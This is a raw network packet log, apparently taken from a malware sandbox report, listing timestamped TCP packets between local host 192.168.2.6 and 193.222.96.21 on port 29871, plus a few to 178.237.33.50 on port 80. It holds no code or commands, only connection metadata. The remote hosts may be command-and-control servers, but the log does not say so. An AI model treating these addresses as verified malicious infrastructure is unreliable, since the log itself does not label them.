                                                      Apr 26, 2024 07:44:26.571460009 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.571508884 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:26.571583986 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.571671963 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.571734905 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.571783066 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:26.571790934 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.571835995 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:26.571856976 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.571932077 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.571983099 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.572029114 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:26.572033882 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.572077990 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:26.572112083 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.572180986 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.572216034 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.572262049 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:26.572287083 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.572329044 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:26.572413921 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.572427988 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.572514057 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.572561026 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:26.572577000 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.572633028 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:26.572657108 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.572715998 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.572804928 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.572850943 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:26.572861910 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.572907925 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:26.573024988 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.573081017 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.573158026 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.573204994 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:26.573232889 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.573292971 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:26.573297977 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.573381901 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.573455095 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.573498964 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:26.573543072 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:26.573582888 CEST2987149709193.222.96.21192.168.2.6
Apr 26, 2024 07:44:26.573587894 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.573648930 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.573679924 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.573725939 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.573776007 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.573822021 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.573822975 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.573892117 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.574003935 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.574050903 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.574074984 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.574089050 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.574120998 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.574155092 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.574191093 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.574222088 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.574304104 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.574350119 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.574394941 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.574404955 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.574446917 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.574466944 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.574526072 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.576992035 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.619055986 CEST | 29871 | 49708 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.741389990 CEST | 80 | 49710 | 178.237.33.50 | 192.168.2.6
Apr 26, 2024 07:44:26.741511106 CEST | 49710 | 80 | 192.168.2.6 | 178.237.33.50
Apr 26, 2024 07:44:26.805514097 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.805604935 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.805660963 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.805680990 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.805743933 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.805805922 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.805901051 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.805939913 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.805993080 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.806004047 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.806085110 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.806162119 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.806216955 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.806314945 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.806363106 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.806396961 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.806469917 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.806510925 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.806548119 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.806577921 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.806622982 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.806653976 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.806705952 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.806792974 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.806807995 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.806839943 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.806869030 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.806871891 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.806951046 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.806988001 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.806997061 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.807074070 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.807126045 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.807190895 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.807198048 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.807234049 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.807305098 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.807368994 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.807439089 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.807488918 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.807503939 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.807526112 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.807527065 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.807571888 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.807616949 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.807647943 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.807703018 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.807792902 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.807840109 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.807900906 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.807946920 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.808542013 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.808629036 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.808708906 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.808759928 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.808772087 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.808820963 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.808841944 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.808893919 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.808964014 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.809015036 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.809043884 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.809087992 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.809106112 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.809151888 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.809223890 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.809262991 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.809267998 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.809315920 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.809345007 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.809448004 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.809519053 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.809557915 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.809648991 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.809690952 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.809732914 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.809849024 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.809914112 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.809959888 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.809958935 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.810003042 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.810033083 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.810100079 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.810192108 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.810235023 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.810260057 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.810303926 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.810363054 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.810446978 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.810655117 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.810697079 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.810766935 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.810811043 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.810858011 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.810947895 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.811027050 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.811078072 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.811090946 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.811136961 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.811158895 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.811206102 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.811260939 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.811300993 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.811321020 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.811333895 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.811363935 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.811407089 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.811454058 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.811486006 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.811563015 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.811619043 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.811664104 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.811683893 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.811743021 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.811750889 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.811815977 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.811903954 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.811949015 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.811963081 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.812011957 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.812016010 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.812159061 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.812222004 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.812268019 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.812298059 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.812344074 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.812369108 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.812447071 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.812490940 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.812536001 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.812577963 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.812621117 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.812642097 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.812771082 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.812861919 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.812907934 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.812937975 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.812983990 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.813003063 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.813079119 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.813148022 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.813193083 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.813195944 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.813242912 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.813265085 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.813313007 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.813350916 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.813394070 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.813405037 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.813452959 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.813508034 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.813539028 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.813581944 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.813587904 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.813672066 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.813707113 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.813755035 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.813786983 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.813829899 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.813860893 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.813956022 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.814016104 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.814058065 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.814069033 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.814091921 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.814122915 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.814168930 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.814250946 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.814302921 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.814321995 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.814368010 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.814380884 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.814394951 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.814542055 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.814585924 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.814589977 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.814631939 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.814635992 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.814699888 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.814783096 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.814831018 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.814836025 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.814879894 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.814901114 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.814977884 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.815052986 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.815099001 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.815129995 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.815175056 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:26.815195084 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.815277100 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:26.815557957 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.038254976 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.038278103 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.038290977 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.038304090 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.038317919 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.038332939 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.038347006 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.038352013 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.038407087 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.038420916 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.038422108 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.038449049 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.038471937 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.038520098 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.038521051 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.038568020 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.038614988 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.038645029 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.038657904 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.038670063 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.038683891 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.038702965 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.038738966 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.038742065 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.038784027 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
